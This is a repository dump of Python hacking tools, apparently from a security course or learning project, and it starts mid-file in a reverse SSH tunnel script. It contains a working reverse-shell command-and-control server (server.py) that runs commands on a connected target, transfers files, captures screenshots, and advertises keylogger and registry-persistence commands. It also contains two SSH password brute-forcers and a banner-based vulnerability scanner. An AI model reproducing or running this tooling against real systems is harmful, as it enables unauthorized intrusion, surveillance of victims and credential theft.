| ) 56 | while True: 57 | r, w, x = select.select([sock, chan], [], []) 58 | if sock in r: 59 | data = sock.recv(1024) 60 | if len(data) == 0: 61 | break 62 | chan.send(data) 63 | if chan in r: 64 | data = chan.recv(1024) 65 | if len(data) == 0: 66 | break 67 | sock.send(data) 68 | chan.close() 69 | sock.close() 70 | verbose("Tunnel closed from %r" % (chan.origin_addr,)) 71 | 72 | 73 | def reverse_forward_tunnel(server_port, remote_host, remote_port, transport): 74 | transport.request_port_forward("", server_port) 75 | while True: 76 | chan = transport.accept(1000) 77 | if chan is None: 78 | continue 79 | thr = threading.Thread( 80 | target=handler, args=(chan, remote_host, remote_port) 81 | ) 82 | thr.setDaemon(True) 83 | thr.start() 84 | 85 | 86 | def verbose(s): 87 | if g_verbose: 88 | print(s) 89 | 90 | 91 | HELP = """\ 92 | Set up a reverse forwarding tunnel across an SSH server, using paramiko. A 93 | port on the SSH server (given with -p) is forwarded across an SSH session 94 | back to the local machine, and out to a remote site reachable from this 95 | network. This is similar to the openssh -R option. 96 | """ 97 | 98 | 99 | def get_host_port(spec, default_port): 100 | """parse 'hostname:22' into a host and port, with the port optional""" 101 | args = (spec.split(":", 1) + [default_port])[:2] 102 | args[1] = int(args[1]) 103 | return args[0], args[1] 104 | 105 | 106 | def parse_options(): 107 | global g_verbose 108 | 109 | parser = OptionParser( 110 | usage="usage: %prog [options] [:]", 111 | version="%prog 1.0", 112 | description=HELP, 113 | ) 114 | parser.add_option( 115 | "-q", 116 | "--quiet", 117 | action="store_false", 118 | dest="verbose", 119 | default=True, 120 | help="squelch all informational output", 121 | ) 122 | parser.add_option( 123 | "-p", 124 | "--remote-port", 125 | action="store", 126 | type="int", 127 | dest="port", 128 | default=DEFAULT_PORT, 129 | help="port on server to forward (default: %d)" % DEFAULT_PORT, 130 | ) 131 | parser.add_option( 132 | "-u", 133 | "--user", 134 | action="store", 135 | type="string", 136 | dest="user", 137 | default=getpass.getuser(), 138 | help="username for SSH authentication (default: %s)" 139 | % getpass.getuser(), 140 | ) 141 | parser.add_option( 142 | "-K", 143 | "--key", 144 | action="store", 145 | type="string", 146 | dest="keyfile", 147 | default=None, 148 | help="private key file to use for SSH authentication", 149 | ) 150 | parser.add_option( 151 | "", 152 | "--no-key", 153 | action="store_false", 154 | dest="look_for_keys", 155 | default=True, 156 | help="don't look for or use a private key file", 157 | ) 158 | parser.add_option( 159 | "-P", 160 | "--password", 161 | action="store_true", 162 | dest="readpass", 163 | default=False, 164 | help="read password (for key or password auth) from stdin", 165 | ) 166 | parser.add_option( 167 | "-r", 168 | "--remote", 169 | action="store", 170 | type="string", 171 | dest="remote", 172 | default=None, 173 | metavar="host:port", 174 | help="remote host and port to forward to", 175 | ) 176 | options, args = parser.parse_args() 177 | 178 | if len(args) != 1: 179 | parser.error("Incorrect number of arguments.") 180 | if options.remote is None: 181 | parser.error("Remote address required (-r).") 182 | 183 | g_verbose = options.verbose 184 | server_host, server_port = get_host_port(args[0], SSH_PORT) 185 | remote_host, remote_port = get_host_port(options.remote, SSH_PORT) 186 | return options, (server_host, server_port), (remote_host, remote_port) 187 | 188 | 189 | def main(): 190 | options, server, remote = parse_options() 191 | 192 | password = None 193 | if options.readpass: 194 | password = getpass.getpass("Enter SSH password: ") 195 | 196 | client = paramiko.SSHClient() 197 | client.load_system_host_keys() 198 | client.set_missing_host_key_policy(paramiko.WarningPolicy()) 199 | 200 | verbose("Connecting to ssh host %s:%d ..." % (server[0], server[1])) 201 | try: 202 | client.connect( 203 | server[0], 204 | server[1], 205 | username=options.user, 206 | key_filename=options.keyfile, 207 | look_for_keys=options.look_for_keys, 208 | password=password, 209 | ) 210 | except Exception as e: 211 | print("*** Failed to connect to %s:%d: %r" % (server[0], server[1], e)) 212 | sys.exit(1) 213 | 214 | verbose( 215 | "Now forwarding remote port %d to %s:%d ..." 216 | % (options.port, remote[0], remote[1]) 217 | ) 218 | 219 | try: 220 | reverse_forward_tunnel( 221 | options.port, remote[0], remote[1], client.get_transport() 222 | ) 223 | except KeyboardInterrupt: 224 | print("C-c: Port forwarding stopped.") 225 | sys.exit(0) 226 | 227 | 228 | if __name__ == "__main__": 229 | main() 230 | -------------------------------------------------------------------------------- /server.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import termcolor 3 | import json 4 | import os 5 | 6 | 7 | 8 | def reliable_recv(): 9 | data = '' 10 | while True: 11 | try: 12 | data = data + target.recv(1024).decode().rstrip() 13 | return json.loads(data) 14 | except ValueError: 15 | continue 16 | 17 | def reliable_send(data): 18 | jsondata = json.dumps(data) 19 | target.send(jsondata.encode()) 20 | 21 | def upload_file(file_name): 22 | f = open(file_name, 'rb') 23 | target.send(f.read()) 24 | 25 | def download_file(file_name): 26 | f = open(file_name, 'wb') 27 | target.settimeout(1) 28 | chunk = target.recv(1024) 29 | while chunk: 30 | f.write(chunk) 31 | try: 32 | chunk = target.recv(1024) 33 | except socket.timeout as e: 34 | break 35 | target.settimeout(None) 36 | f.close() 37 | 38 | 39 | def target_communication(): 40 | count = 0 41 | while True: 42 | command = input('* Shell~%s: ' % str(ip)) 43 | reliable_send(command) 44 | if command == 'quit': 45 | break 46 | elif command == 'clear': 47 | os.system('clear') 48 | elif command[:3] == 'cd ': 49 | pass 50 | elif command[:6] == 'upload': 51 | upload_file(command[7:]) 52 | elif command[:8] == 'download': 53 | download_file(command[9:]) 54 | elif command[:10] == 'screenshot': 55 | f = open('screenshot%d' % (count), 'wb') 56 | target.settimeout(3) 57 | chunk = target.recv(1024) 58 | while chunk: 59 | f.write(chunk) 60 | try: 61 | chunk = target.recv(1024) 62 | except socket.timeout as e: 63 | break 64 | target.settimeout(None) 65 | f.close() 66 | count += 1 67 | elif command == 'help': 68 | print(termcolor.colored('''\n 69 | quit --> Quit Session With The Target 70 | clear --> Clear The Screen 71 | cd *Directory Name* --> Changes Directory On Target System 72 | upload *file name* --> Upload File To The target Machine 73 | download *file name* --> Download File From Target Machine 74 | keylog_start --> Start The Keylogger 75 | keylog_dump --> Print Keystrokes That The Target Inputted 76 | keylog_stop --> Stop And Self Destruct Keylogger File 77 | persistence *RegName* *fileName* --> Create Persistence In Registry'''),'green') 78 | else: 79 | result = reliable_recv() 80 | print(result) 81 | 82 | 83 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 84 | sock.bind(('192.168.1.4', 5555)) 85 | print(termcolor.colored('[+] Listening For The Incoming Connections', 'green')) 86 | sock.listen(5) 87 | target, ip = sock.accept() 88 | print(termcolor.colored('[+] Target Connected From: ' + str(ip), 'green')) 89 | target_communication() -------------------------------------------------------------------------------- /sshbrute.py: -------------------------------------------------------------------------------- 1 | import paramiko, sys, os, socket, termcolor 2 | 3 | def ssh_connect(password, code=0): 4 | ssh = paramiko.SSHClient() 5 | ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) 6 | 7 | try: 8 | ssh.connect(host, port=22, username=username, password=password) 9 | except paramiko.AuthenticationException: 10 | code = 1 11 | except socket.error as e: 12 | code = 2 13 | 14 | ssh.close() 15 | return code 16 | 17 | host = input('[+] Target Address: ') 18 | username = input('[+] SSH Username: ') 19 | input_file = input('[+] Passwords File: ') 20 | print('\n') 21 | 22 | if os.path.exists(input_file) == False: 23 | print('[!!] That File/Path Doesnt Exist') 24 | sys.exit(1) 25 | 26 | with open(input_file, 'r') as file: 27 | for line in file.readlines(): 28 | password = line.strip() 29 | try: 30 | response = ssh_connect(password) 31 | if response == 0: 32 | print(termcolor.colored(('[+] Found Password: ' + password + ' , For Account: ' + username), 'green')) 33 | break 34 | elif response == 1: 35 | print('[-] Incorrect Login: ' + password) 36 | elif response == 2: 37 | print('[!!] Cant Connect') 38 | sys.exit(1) 39 | except Exception as e: 40 | print(e) 41 | pass 42 | -------------------------------------------------------------------------------- /sshbrutethreaded.py: -------------------------------------------------------------------------------- 1 | import paramiko, sys, os, termcolor 2 | import threading, time 3 | 4 | stop_flag = 0 5 | 6 | def ssh_connect(password): 7 | global stop_flag 8 | ssh = paramiko.SSHClient() 9 | ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) 10 | try: 11 | ssh.connect(host, port=22, username=username, password=password) 12 | stop_flag = 1 13 | print(termcolor.colored(('[+] Found Password: ' + password + ', For Account: ' + username), 'green')) 14 | except: 15 | print(termcolor.colored(('[-] Incorrect Login: ' + password), 'red')) 16 | ssh.close() 17 | 18 | host = input('[+] Target Address: ') 19 | username = input('[+] SSH Username: ') 20 | input_file = input('[+] Passwords File: ') 21 | print('\n') 22 | 23 | if os.path.exists(input_file) == False: 24 | print('[!!] That File/Path Doesnt Exist') 25 | sys.exit(1) 26 | 27 | print('* * * Starting Threaded SSH Bruteforce On ' + host + ' With Account: ' + username + '* * *') 28 | 29 | 30 | with open(input_file, 'r') as file: 31 | for line in file.readlines(): 32 | if stop_flag == 1: 33 | t.join() 34 | exit() 35 | password = line.strip() 36 | t = threading.Thread(target=ssh_connect, args=(password,)) 37 | t.start() 38 | time.sleep(0.5) 39 | -------------------------------------------------------------------------------- /tcp-client.py: -------------------------------------------------------------------------------- 1 | import socket 2 | 3 | target_host = "www.google.com" 4 | target_port = 80 5 | 6 | # create a socket object 7 | client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 8 | 9 | # connect the client 10 | client.connect((target_host, target_port)) 11 | 12 | # send some data 13 | client.send(b"GET / HTTP/1.1\r\nHost: google.com\rn\r\n") 14 | 15 | # receive data 16 | response = client.recv(4096) 17 | 18 | client.close() 19 | 20 | print(response) -------------------------------------------------------------------------------- /tcp-server.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import threading 3 | from urllib import request 4 | 5 | bind_ip = "0.0.0.0" 6 | bind_port = 9999 7 | 8 | server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 9 | 10 | server.bind((bind_ip, bind_port)) 11 | 12 | server.listen(5) 13 | 14 | print("[*] Listening on %s:%d" % (bind_ip, bind_port)) 15 | 16 | 17 | # this is our client handling thread 18 | def handle_client(client_socket): 19 | # just print out what the client sends 20 | request = client_socket.recv(1024) 21 | 22 | print("[*] Received: %s" % request) 23 | 24 | # send back a packet 25 | client_socket.send(b"ACK!") 26 | print(client_socket.getpeername()) 27 | client_socket.close() 28 | 29 | while True: 30 | client, addr = server.accept() 31 | 32 | print("[*] Accepted connection from: %s:%d" % (addr[0], addr[1])) 33 | 34 | # spin up our client thread to handle incoming data 35 | client_handler = threading.Thread(target=handle_client, args=(client,)) 36 | client_handler.start() -------------------------------------------------------------------------------- /udp-client.py: -------------------------------------------------------------------------------- 1 | import socket 2 | 3 | target_host = "127.0.0.1" 4 | target_port = 80 5 | 6 | # create a socket object 7 | client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) 8 | 9 | # send some data 10 | client.sendto(b"AAABBBCCC", (target_host, target_port)) 11 | 12 | # receive some data 13 | data, addr = client.recvfrom(4096) 14 | 15 | client.close() 16 | 17 | print(data) -------------------------------------------------------------------------------- /vulscan.py: -------------------------------------------------------------------------------- 1 | import portscanner 2 | 3 | targets_ip = input('[+] * Enter Target To Scan For Vulnerable Open Ports: ') 4 | port_number = int(input('[+] * Enter Amount Of Ports You Want To Scan(500 - first 500 ports): ')) 5 | vul_file = input('[+] * Enter Path To The File With Vulnerable Softwares: ') 6 | print('\n') 7 | 8 | target = portscanner.PortScan(targets_ip, port_number) 9 | target.scan() 10 | 11 | with open(vul_file, 'r') as file: 12 | count = 0 13 | for banner in target.banners: 14 | file.seek(0) 15 | for line in file.readlines(): 16 | if line.strip() in banner: 17 | print('[!!] VULNERABLE BANNER: "' + banner + '" ON PORT: ' + str(target.open_ports[count])) 18 | count += 1 19 | -------------------------------------------------------------------------------- /wireless.py: -------------------------------------------------------------------------------- 1 | from wireless import Wireless --------------------------------------------------------------------------------